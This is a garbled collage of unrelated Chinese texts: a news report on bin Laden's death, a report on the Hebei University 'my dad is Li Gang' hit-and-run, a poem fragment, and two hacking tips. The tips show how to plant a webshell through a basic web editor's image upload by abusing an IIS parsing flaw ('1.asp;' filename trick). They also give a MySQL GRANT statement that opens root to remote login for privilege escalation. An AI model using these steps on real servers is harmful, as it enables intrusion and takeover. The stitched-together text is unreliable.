美国总统奥巴马1日晚突然召开记者会,正式宣布基地组织头目本·拉登已经死亡。在奥巴马发表演讲前后,许多美国民众已高举国旗聚集到白宫附近,他们高呼口号,庆祝拉登之死。 中新社记者 德永健 摄 中新网5月2日电 综合报道,在“9-11”恐怖袭击事件过去近10年之后,美国总统奥巴马在当地时间1日晚发表全国电视演讲,宣布“基地”组织领导人奥萨马·本·拉登已被打死。 美国欢庆拉登之死 奥巴马早些时候在宣布美军击毙本·拉登的消息时说,美国情报机构和军方在去年8月首次向他通报得到本·拉登下落的消息,美国最终发现本·拉登藏身于巴基斯坦境内。上星期,奥巴马批准了美军对本·拉登藏身处发动袭击。 奥巴马在全国演讲中称:“击毙本·拉登是美国反恐行动上的重大成就。” 美国前总统乔治-W·布什称,世界头号通缉恐怖分子奥萨马·本·拉登被击毙标志着“美国的胜利”。 美前总统克林顿也说,本·拉登的死对全世界渴望和平、自由和合作的人来说都是重要的时刻。 在奥巴马宣布拉登被击毙后,虽然美国国务院立即向美国公民发布全球旅行警报,称可能会突发针对美国的报复性暴力袭击,但仍有大批纽约人向纽约世贸中心遗址和时代广场
近日,一个李姓青年在河北大学新校区易百超市门口,驾驶黑色轿车撞倒两名穿着轮滑鞋的女生后,司机不但没有停车,反而继续去校内宿舍楼接女友。返回途中被学生和保安拦下,但该李姓年轻男子却高喊“有本事你们告去,我爸爸是李刚”。被撞伤的两名女生中,一陈姓女生经抢救无效死亡。 昨日,天涯杂谈上,网友“河大义工”的一篇帖子引爆了网络,截至昨日傍晚,点击量已达47万。这篇帖子描述了一起校园车祸。 10月16日晚9:40,河北大学新区易百超市门口,两名正在玩轮滑的女生在学校宿舍区超市门口被一辆汽车撞到,被撞者均为河北工商学院大一新生。 帖子称:“当时车速很快,大约80~100码。被撞女生腾空特别高,而且这辆车撞人后并没有减速,后轮从一名女生的身上碾过。” “在撞到人后,他竟然继续行进,想从大门口逃跑,后被学生及保安拦下。下车后,肇事者未表现出丝毫的歉意,他竟然说:“看把我(的)车(给)刮的!你知道我爸是谁吗?我爸是李刚!” 酒后肇事,还口出狂言“我爸是李刚”,这引起了网友的极大愤慨与关注。
今生的水 前世的茶往事如茶 茶魂飘香千年寂寞风干成一捏儿古茶谁能分辨哪是茶叶哪是茶花或许心有灵犀的人才能看透它这心有灵犀的人
在拿站的过程中有时候会遇到这种编辑器,它相当的简陋,没有管理后台,没有数据库备份,也没有什么可以直接上传webshell的地方,简陋到只有一个editor的界面。如下图:相信这个编辑器大家都见过,我记得雷池新闻系统用的就是这个编辑器,呵呵。下面我们来看看利用方法:点击图片上传后会出现上传页面,地址为http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=用普通的图片上传后,地址为http://www.xxx.cn/news/uppic/41513102009204012_1.gif记住这时候的路径在点击图片的上传,这时候地址就变成了http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012很明显。图片的地址是根据RemNum后面的编号生成的。利用很简单 配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102
提权的时候,如果遇到了服务器开启了3306 端口,但是不允许root外连的情况,我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权。GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’ IDENTIFIED BY ‘rootpassword’ WITH GRANT OPTION;